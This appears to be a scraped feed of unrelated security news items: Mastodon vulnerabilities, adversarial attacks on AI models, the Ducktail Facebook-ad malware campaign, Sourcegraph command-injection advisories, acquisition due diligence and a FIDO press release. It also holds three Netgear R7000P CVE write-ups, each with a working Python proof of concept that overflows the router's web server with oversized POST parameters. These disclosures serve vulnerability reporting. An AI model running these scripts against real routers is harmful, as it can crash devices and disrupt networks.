As the open source social media network grabs the spotlight as a Twitter replacement, researchers caution about vulnerabilities.

From an anonymous server collecting user information to configuration errors that create vulnerabilities, infosec experts are pointing out security holes in Mastodon, which, seen as a replacement for Twittern is experiencing massive user growth — and an increased scrutiny of its flaws.  

Unlike other social media apps, which have a central authority, Mastodon is a federation of servers that can communicate with each other but which are maintained and run separately by independent admins. That means different rules, different configurations, and sometimes different software versions could apply to different users and postings.

One of the most popular "instances" — the Mastodon term for individual servers/communities — for the cybersecurity community is infosec.exchange, and its members certainly scrutinize its configuration. Gareth Heyes (@gaz on infosec.exchange), a researcher at PortSwigger, uncovered an HTML injection vulnerability stemming from attributes of the specific software fork used.

In another example from a recent Security Week article, Lenin Alevski (@alevsk on infosec.exchange), a security software engineer at MinIO, pointed out a system misconfiguration that would allow him to download, modify, or delete everything in the instance's S3 cloud storage bucket.

Finally, researcher Anurag Sen (@hak1mlukha on infosec.exchange) discovered an anonymous server that was scraping Mastodon user data.

**Twitter Users Flock to Mastodon**

Until recently, Mastodon was considered part of the social-media underground, an alternative to Twitter created in 2016 as an escape hatch in the face of buyout rumors. When Elon Musk first agreed to buy the microblogging behemoth back in April, Mastodon gained 30,000 new users in a day, compared with a more typical growth of below 2,000 a day. But that's a drop in the bucket compared with the 135,000 new users who joined on Nov. 7.

"Treat the Fediverse and any Mastodon instance as a place to share information, connect, and collaborate in the same way you'd do those things in person in a town square or public coffee shop. In short, don't use Mastodon to send sensitive, personal, or private information you wouldn't be comfortable posting publicly anyway," said Melissa Bischoping, director and endpoint security research specialist at Tanium, via email.

"Aside from the code, the way Mastodon is segmented means one or two people who administer a particular instance are the weak link in the security model," added David Maynor, senior director of threat intelligence at Cybrary. "My moving advice is firmly 'buyer beware.'"

Of course, Twitter is no stranger to security issues, so _caveat emptor_ is timeless and universal.

Cybersecurity Pros Put Mastodon Flaws Under the Microscope

An AI's "world" only includes the data on which it was trained, so it otherwise lacks context — opening the door for creative attacks from cyber adversaries.

Artificial intelligence and machine learning (AI/ML) systems trained using real-world data are increasingly being seen as open to certain attacks that fool the systems by using unexpected inputs.

At the recent Machine Learning Security Evasion Competition (MLSEC 2022), contestants successfully modified celebrity photos with the goal of having them recognized as a different person, while minimizing obvious changes to the original images. The most common approaches included merging two images — similar to a deepfake — and inserting a smaller image inside the frame of the original.

In another example, researchers from the Massachusetts Institute of Technology (MIT), University of California at Berkeley, and FAR AI found that a professional-level Go AI — that is, for the ancient board game — could be trivially beaten with moves that convinced the machine that the game had completed. While the Go AI could defeat a professional or amateur Go player because they used a logical set of movies, an adversarial attack could easily beat the machine by making decisions that no rational player would normally make.

These attacks highlight that while AI technology may work at superhuman levels and even be extensively tested in real-life scenarios, it continues to be vulnerable to unexpected inputs, says Adam Gleave, a doctoral candidate in artificial intelligence at the University of California at Berkeley, and one of the primary authors of the Go AI paper.

"I would default to assuming that any given machine learning system is insecure," he says. "\[W\]e should always avoid relying on machine learning systems, or any other individual piece of code, more than is strictly necessary \[and\] have the AI system recommend decisions but have a human approve them prior to execution."

All of this underscores a fundamental problem: Systems that are trained to be effective against "real-world" situations — by being trained on real-world data and scenarios — may behave erratically and insecurely when presented with anomalous, or malicious, inputs.

The problem crosses applications and systems. A self-driving car, for example, could handle nearly every situation that a normal driver might encounter while on the road, but act catastrophically during an anomalous event or one caused by an attacker, says Gary McGraw, a cybersecurity expert and co-founder of the Berryville Institute of Machine Learning (BIML).

"The real challenge of machine learning is figuring out how to be very flexible and do things as they are supposed to be done usually, but then to react correctly when an anomalous event occurs," he says, adding: "You typically generalize to what experts do, because you want to build an expert ... so it's what clueless people do, using surprise moves ... that can cause something interesting to happen."

**Fooling AI (And Users) Isn't Hard**

Because few developers of machine learning models and AI systems focus on adversarial attacks and using red teams to test their designs, finding ways to cause AI/ML systems to fail is fairly easy. MITRE, Microsoft, and other organizations have urged companies to take the threat of adversarial AI attacks more seriously, describing current attacks through the Adversarial Threat Landscape for Artificial-Intelligence Systems (ATLAS) knowledge base and noting that research into AI — often without any sort of robustness or security designed in — has skyrocketed.

Part of the problem is that non-experts who do not understand the mathematics behind machine learning often believe that the systems understand context and the world in which it operates. 

Large models for machine learning, such as the graphics-generating DALL-e and the prose-generating GPT-3, have massive data sets and emergent models that appear to result in a machine that reasons, says David Hoelzer, a SANS Fellow at the SANS Technical Institute. 

Yet, for such models, their "world" includes only the data on which they were trained, and so they otherwise lack context. Creating AI systems that act correctly in the face of anomalies or malicious attacks requires threat modeling that takes into account a variety of issues.

"In my experience, most who are building AI/ML solutions are not thinking about how to secure the ... solutions in any real ways," Hoelzer says. "Certainly, chatbot developers have learned that you need to be very careful with the data you provide during training and what kinds of inputs can be permitted from humans that might influence the training so that you can avoid a bot that turns offensive."

At a high level, there are three approaches to an attack on AI-powered systems, such as those for image recognition, says Eugene Neelou, technical director for AI safety at Adversa.ai, a firm focused on adversarial attacks on machine learning and AI systems.

Those are: embedding a smaller image inside the main image; mixing two sets of inputs — such as images — to create a morphed version; or adding specific noise that causes the AI system to fail in a specific way. This last method is typically the least obvious to a human, while still being effective against AI systems.

In a black-box competition to fool AI systems run by Adversa.ai, all but one contestant used the first two types of attacks, the firm stated in a summary of the contest results. The lesson is that AI algorithms do not make systems harder to attack, but easier because they increase the attack surface of regular applications, Neelou says.

"Traditional cybersecurity cannot protect from AI vulnerabilities — the security of AI models is a distinct domain that should be implemented in organizations where AI/ML is responsible for mission-critical or business-critical decisions," he says. "And it's not only facial recognition — anti-fraud, spam filters, content moderation, autonomous driving, and even healthcare AI applications can be bypassed in a similar way."

**Test AI Models for Robustness**

Like other types of brute-force attacks, rate limiting the number of attempted inputs can also help the creators of AI systems prevent ML attacks. In attacking the Go system, UC Berkeley's Gleave and the other researchers built their own adversarial system, which repeatedly played games against the targeted system, raising the victim AI's difficulty level as the adversary became increasingly successful.

The attack technique underscores a potential countermeasure, he says.

"We assume the attacker can train against a fixed 'victim' agent for millions of time steps," Gleave says. "This is a reasonable assumption if the 'victim' is software you can run on your local machine, but not if it's behind an API, in which case you might get detected as being abusive and kicked off the platform, or the victim might learn to stop being vulnerable over time — which introduces a new set of security risks around data poisoning but would help defend against our attack."

Companies should continue following security best practices, including the principle of least privilege — don't give workers more access to sensitive systems than they need or rely on the output of those systems more than necessary. Finally, design the entire ML pipeline and AI system for robustness, he says.

"I'd trust a machine learning system more if it had been extensively adversarially tested, ideally by an independent red team, and if the designers had used training techniques known to be more robust," Gleave says.

Adversarial AI Attacks Highlight Fundamental Security Issues

The Vietnam-based financial cybercrime operation's primary goal is to push out fraudulent ads via compromised business accounts.

A financially motivated threat actor targeting individuals and organizations on Facebook's Ads and Business platform has resumed operations after a brief hiatus, with a new bag of tricks for hijacking accounts and profiting from them.

The Vietnam-based threat campaign, dubbed Ducktail, has been active since at least May 2021 and has affected users with Facebook business accounts in the United States and more than three dozen other countries. Security researchers from WithSecure (formerly F-Secure) who are tracking Ducktail have assessed that the threat actor's primary goal is to push out ads fraudulently via Facebook business accounts to which they manage to gain control.

**Evolving Tactics**

WithSecure spotted Ducktail's activity earlier this year and disclosed details of its tactics and techniques in a July blog post. The disclosure forced Ducktail's operators to suspend operations briefly while they devised new methods for continuing with their campaign.

In September, Ducktail resurfaced with changes to the way it operates and to its mechanisms for evading detection. Far from slowing down, the group appears to have expanded its operations, onboarding multiple affiliate groups to its campaign, WithSecure said in a report on Nov. 22.

In addition to using LinkedIn as an avenue for spear-phishing targets, as it did in previous campaigns, the Ducktail group has now begun using WhatsApp for targeting users as well. The group has also tweaked the capabilities of its primary information stealer and has adopted a new file format for it, to evade detection. Over the course of the last two or three months, Ducktail also has registered multiple fraudulent companies in Vietnam, apparently as a cover for obtaining digital certificates for signing its malware.

"We believe the Ducktail operation uses hijacked business account access purely to make money by pushing out fraudulent ads," says Mohammad Kazem Hassan Nejad, a researcher at WithSecure Intelligence. 

In situations where the threat actor gains access to the finance editor role on a compromised Facebook business account, they also have the ability to modify business credit card information and financial details, such as transactions, invoices, account spending, and payment methods, Nejad says. This would allow the threat actor to add other businesses to the credit card and monthly invoices, and use the linked payment methods to run ads.

"The hijacked business could therefore be used for purposes such as advertising, fraud, or even to spread disinformation," Nejad says. "The threat actor could also use their newfound access to blackmail a company by locking them out of their own page."

**Targeted Attacks**

The tactic of Ducktail's operators is to first identify organizations that have a Facebook Business or Ads account and then target individuals within those companies whom they perceive as having high-level access to the account. Individuals the group has typically targeted include people with managerial roles or roles in digital marketing, digital media, and human resources. 

The attack chain starts with the threat actor sending the targeted individual a spear-phishing lure via LinkedIn or WhatsApp. Users who fall for the lure end up having Ducktail's information stealer installed on their system. The malware can carry out multiple functions, including extracting all stored browser cookies and Facebook session cookies from the victim machine, specific registry data, Facebook security tokens, and Facebook account information. 

The malware steals a wide range of information on all businesses associated with the Facebook account, including name, verification stats, ad spending limits, roles, invite link, client ID, ad account permissions, permitted tasks, and access status. The malware collects similar information on any ad accounts associated with the compromised Facebook account.

The information stealer can "steal information from the victim's Facebook account and hijack any Facebook Business account to which the victim has sufficient access by adding attacker-controlled email addresses into the business account with administrator privileges and finance editor roles," Nejad says.  Adding an email address to a Facebook Business account prompts Facebook to send a link via email to that address — which, in this case, is controlled by the attacker. The threat actor uses that link to gain access to the account, according to WithSecure.

Threat actors with admin access to a victim's Facebook account can do a lot of damage, including taking full control of the business account; viewing and modifying settings, people, and account details; and even deleting the business profile outright, Nejad says. When a targeted victim might not have sufficient access to allow the malware to add the threat actor’s email addresses, the threat has actor relied on the information exfiltrated from the victims’ machines and Facebook accounts to impersonate them.

**Building Smarter Malware**

Nejad says that prior versions of Ducktail's information stealer contained a hard-coded list of email addresses to use for hijacking business accounts. 

"However, with the recent campaign, we observed the threat actor removing this functionality and relying entirely on fetching email addresses directly from its command-and-control channel (C2)," hosted on Telegram, the researcher says. Upon launch, the malware establishes a connection to the C2 and waits for a duration of time to receive a list of attacker-controlled email addresses in order to proceed, he adds.

The report lists several steps that organization can take to mitigate exposure to Ducktail-like attack campaigns, beginning with raising awareness of spear-phishing scams targeting users with access to Facebook business accounts. 

Organizations should also enforce application whitelisting to prevent unknown executables from running, ensure that all managed or personal devices used with company Facebook accounts have basic hygiene and protection in place, and use private browsing to authenticate each work session when accessing Facebook Business accounts.

Ducktail Cyberattackers Add WhatsApp to Facebook Business Attack Chain

Sourcegraph is a code intelligence platform. In versions prior to 4.1.0 a command Injection vulnerability existed in the gitserver service, present in all Sourcegraph deployments. This vulnerability was caused by a lack of input validation on the host parameter of the `/list-gitolite` endpoint. It was possible to send a crafted request to gitserver that would execute commands inside the container. Successful exploitation requires the ability to send local requests to gitserver. The issue is patched in version 4.1.0.

**Impact**

A Command Injection vulnerability existed in the gitserver service, present in all Sourcegraph deployments. This vulnerability was caused by a lack of input validation on the host parameter of the /list-gitolite endpoint. It was possible to send a crafted request to gitserver that would execute commands inside the container.

Successful exploitation requires the ability to send local requests to gitserver.

**Patches**

The issue is patched in version 4.1.0.

**References**

*   #42553

**For more information**

If you have any questions or comments about this advisory email us at security@sourcegraph.com

CVE-2022-41942: Command Injection in gitserver

sourcegraph is a code intelligence platform. As a site admin it was possible to execute arbitrary commands on Gitserver when the experimental `customGitFetch` feature was enabled. This experimental feature has now been disabled by default. This issue has been patched in version 4.1.0.

**Conversation**

 evict mentioned this pull request

Oct 7, 2022

evict and others added 7 commits

Oct 14, 2022

 

\* switch to enable rather than disable env var

\* add changelog entry

Co-authored-by: Vincent Ruijter <vincent.ruijter@sourcegraph.com>

 evict deleted the vincent/optional-disable-custom-git-fetch branch

Oct 14, 2022

vovakulikov pushed a commit that referenced this pull request

Oct 17, 2022

\* add env var for disabling customGitFetch

Co-authored-by: Warren Gifford <warren@sourcegraph.com>
Co-authored-by: Dax McDonald <dax@sourcegraph.com>

CVE-2022-41943: Add optional switch for disabling custom git fetch by evict · Pull Request #42704 · sourcegraph/sourcegraph

To get the full picture, companies need to look into the cybersecurity history and practices of the business they're acquiring.

Imagine getting ready to spend billions of dollars on an acquisition, only to find out that the target of the acquisition was the victim of multiple cyberattacks affecting billions of accounts. One would think such a scenario would be a huge red flag that no corporate board or general counsel would ever forget, regardless of the size of the acquisition, but that clarion call does not seem to be heard universally.

That's what happened around the 2017 revelation of the massive breach of Yahoo uncovered by its sale to Verizon, and it cost the search engine company a $400 million hit to its purchase price. Apparently, however, cybersecurity and related technological components are still relatively low on the essential due diligence checklist.

The right time to start evaluating the cybersecurity risk profile of an acquisition target, experts agree, is early on in the due diligence process. Too often due diligence is limited to balance sheets, sales operations, and outstanding legal obligations, with cybersecurity, compliance, and technical compatibility of security tools left to the end of the discussion, if they are discussed at all.

"The value of pre-sign due diligence is to make sure that companies are assessing all the relevant risks before they sign on the dotted line," says John Hauser, principal and cyber due diligence leader at Ernst & Young, as well as a former FBI special agent and a former assistant United States Attorney. "Cyber can be a major factor in deciding whether or not a client decides to walk away" from a merger or acquisition.

Early cyber due diligence allows a potential suitor to "negotiate better terms through the purchase price reductions, or indemnities, or other contractual provisions," he adds.

In conjunction with the traditional business due diligence, companies are turning to threat intelligence experts to evaluate the prospective target's risk profile, looking for evidence that the company might have been breached with data for sale on the Dark Web or perhaps has weak controls on other internal operations. Using open source intelligence (OSINT), he said, investigators often can find evidence of a breach, such as indicators of leaked credentials, communications between the target company infrastructure and any known malware families and command and control servers, or other insights.

Other significant intelligence can be gleaned by asking the target company to provide data such as attestations made to a cyber insurance provider, source code, penetration test results, and past compliance reports. 

"You're starting to see more technical verification, moving into the pre-sign phase," Hauser says.

**Assessing Vulnerabilities**

Cyber criminals often watch mergers and acquisitions activity, looking for a potentially weak target being acquired by a stronger company, especially one that might have a lot of valuable information for the cybercrooks, notes Heather Clauson Haughian, founder and managing partner at the Atlanta-based law firm Culhane Meadows. Once the acquisition goes through, it would not be uncommon for the target firm to get attacked with the hopes of breaching a weak link and thus accessing the more lucrative part of the merged companies.

Another vulnerability occurs when organizations with differing compliance requirements join, Haughian says. While the acquiring organization might be well versed in its own compliance reporting requirements, it might not have the same expertise with the company it acquires.

If the acquiring company does not employ compliance experts for the acquired company's operations, there could be a gap in compliance reporting, along with missed opportunities to layer security controls over the acquired company, leaving it vulnerable to a cyberattack, she says.

In such cases, using a third-party advisory service is recommended, says Shay Colson, managing partner of cyber diligence at Bellingham, Washington-based firm Coastal Cyber Risk Advisors. A company executing a bolt-on, add-on, or tuck-in acquisition can have its third-party adviser evaluate the target's security posture, including what its program looks like, strengths and weaknesses, and existing security tool sets. 

"Then you can get views on the targets that are both objective to the target and deal with this integration challenge," he says.

**Taking Responsibility**

Ultimately, general counsels need to come up to speed as quickly as possible on cyber risk and cybersecurity. "They are going to be the ones who own cyber risk at their enterprise because if there's an incident, they're calling outside counsel, they're coordinating forensics, and they're looking at regulatory response obligations," Colson says.

"I think the more proactive \[general counsels\] are, \[they are\] going to realize that cyber risk is a place where they can actually drive value to the business and enable things," he adds. "It's just a matter of time before more and more GCs get on board with that."

EY's Hauser said that SEC Chairman Gary Gensler's recent proposed rules for public companies and other financial services organizations could help boards of directors to navigate through the cybersecurity due diligence challenges.

There is a consensus that there is a growing risk of cybercrimes and that boards need to pay greater attention to it, he said. Courts and regulators are making it explicitly clear that failing to do proper cyber due diligence makes it easier for a future plaintiff to accuse a board member of negligence. That, combined with Gensler's proposed rules that put more personal responsibility on C-suites and board members, and you have the perfect storm for cybersecurity experts to take a more active role in board-level decisions, he notes.

Cyber Due Diligence in M&As Uncovers Threats, Improves Valuations

Netgear R7000P V1.3.0.8, V1.3.1.64 is vulnerable to Buffer Overflow via parameters: stamode_dns1_pri and stamode_dns1_sec.

**Netgear R7000P has a Stack Buffer Overflow Vulnerability****Product**

1.  product information: https://www.netgear.com
2.  firmware download: http://www.downloads.netgear.com/files/GDC/R7000P/R7000P-V1.3.0.8\_1.0.93.zip

http://www.downloads.netgear.com/files/GDC/R7000P/R7000P-V1.3.1.64\_10.1.36.zip

**Affected version**

V1.3.0.8, V1.3.1.64

**Vulnerability**

The stack overfow vulnerability is in /usr/sbin/httpd. The vulnerability occurrs in the sub_62A2C function, which can be accessed via the URL http://routerlogin.net/DIG_reboot_wireless.htm.

In this function, stamode_dns1_pri is controllable and will be passed into the v109 variable and v109 will be passed into stack s by sprintf. It is worth noting that there is no size check, which leads to a stack overflow vulnerability.

Also, stamode_dns1_sec is controllable and will be passed into the v108 variable and v108 will be passed into stack s by sprintf. It is worth noting that there is no size check, which leads to a stack overflow vulnerability.

**PoC**

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80
r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)
r.connect((ip, port))
rn \= b'\\r\\n'
p1 \= b'a' \* 0x3000
p2 \= b'stamode\_dns1\_pri=' + p1 \# payload
p3 \= b"POST /WLG\_wireless\_dual\_band\_r10.html" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

CVE-2022-44200: IoT_vuln/Netgear/R7000P/17 at main · RobinWang825/IoT_vuln

Netgear R7000P V1.3.1.64 is vulnerable to Buffer Overflow via parameter enable_band_steering.

The stack overfow vulnerability is in /usr/sbin/httpd. The vulnerability occurrs in the sub_5835C function, which can be accessed via the URL http://routerlogin.net/WLG_wireless_dual_band_r10.htm.

Parameter enable_band_steering, is controllable and will be formatted by printf for the print output. . Users can control formatting instructions, and attackers can use this capability to expose or overwrite memory values and compromise program security.

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80
r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)
r.connect((ip, port))
rn \= b'\\r\\n'
p1 \= b'a' \* 0x3000
p2 \= b'enable\_band\_steering=' + p1 \# payload
p3 \= b"POST /WLG\_wireless\_dual\_band\_r10.html" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

CVE-2022-44190: IoT_vuln/Netgear/R7000P/6 at main · RobinWang825/IoT_vuln

Netgear R7000P V1.3.1.64 is vulnerable to Buffer Overflow via parameters KEY1 and KEY2.

The stack overfow vulnerability is in /usr/sbin/httpd. The vulnerability occurrs in the sub_5835C function, which can be accessed via the URL http://routerlogin.net/WLG_wireless_dual_band_r10.htm.

This function accepts the POST parameter KEY1 without verifying its length, and copies an unbounded stack with strcpy which will result in a stack overflow. This vulnerability allows an attacker to cause denial of service (DoS).

It also happened in parameter KEY2.

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80
r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)
r.connect((ip, port))
rn \= b'\\r\\n'
p1 \= b'a' \* 0x3000
p2 \= b'KEY1=' + p1 \# payload
p3 \= b"POST /WLG\_wireless\_dual\_band\_r10.html" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

CVE-2022-44191: IoT_vuln/Netgear/R7000P/8 at main · RobinWang825/IoT_vuln

Industry experts to share insights into how FIDO and related technologies can bring password-less authentication to IoT.

**MOUNTAIN VIEW, Calif., Nov. 22, 2022 /PRNewswire/ —** The FIDO Alliance today announces its latest Authenticate Virtual Summit: Securely Onboarding All the Things: The FIDO Fit in IoT, sponsored by Daon and Nok Nok. Responding to rising industry demand for more insight into the role of FIDO and passwordless technology in IoT, the free event will offer attendees expert perspectives and education from leading industry organizations and solution providers on strengthening authentication in IoT. The program will take place virtually on December 7 2022, from 8:00am - 12:00pm PT, and will be made available to registrants on-demand following the event.

Lack of IoT security standards and outdated processes, such as shipping with default password credentials and manual onboarding, leave devices and the networks they operate on open to large-scale attacks. As the IoT market continues to grow, projected to surpass the $1 trillion mark in 2022, the FIDO Alliance formed the IoT Technical Working Group to address these challenges – aiming to provide a comprehensive authentication framework for IoT devices relying on passwordless authentication.

Launched in 2021, the FIDO Device Onboard (FDO) specification is the working group's first output: an open IoT standard which enables devices to simply and securely onboard to cloud and on-premise management platforms. The upcoming virtual summit will delve into this specification and FIDO's role in IoT with speakers from Intel, Qualcomm, FIDO Alliance and more:

*   Introduction: The FIDO Fit in IoT
*   Introduction to FIDO Device Onboard
*   FIDO Device Onboard: Technical Deep Dive
*   FDO Demo
*   FDO Case Study
*   FDO Certification 101

Register for the event here.

**Sponsorship Opportunities**

The Authenticate 2022 Virtual Summit series is accepting applications for sponsorship, offering a number of lead generation and brand visibility opportunities. Visit the Authenticate sponsorship page for more information or contact \[email protected\].

**About the FIDO Alliance**

The FIDO (Fast IDentity Online) Alliance, www.fidoalliance.org, was formed in July 2012 to address the lack of interoperability among strong authentication technologies, and remedy the problems users face with creating and remembering multiple usernames and passwords. The FIDO Alliance is changing the nature of authentication with standards for simpler, stronger authentication that define an open, scalable, interoperable set of mechanisms that reduce reliance on passwords. FIDO Authentication is stronger, private, and easier to use when authenticating to online services.

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Tag

#intel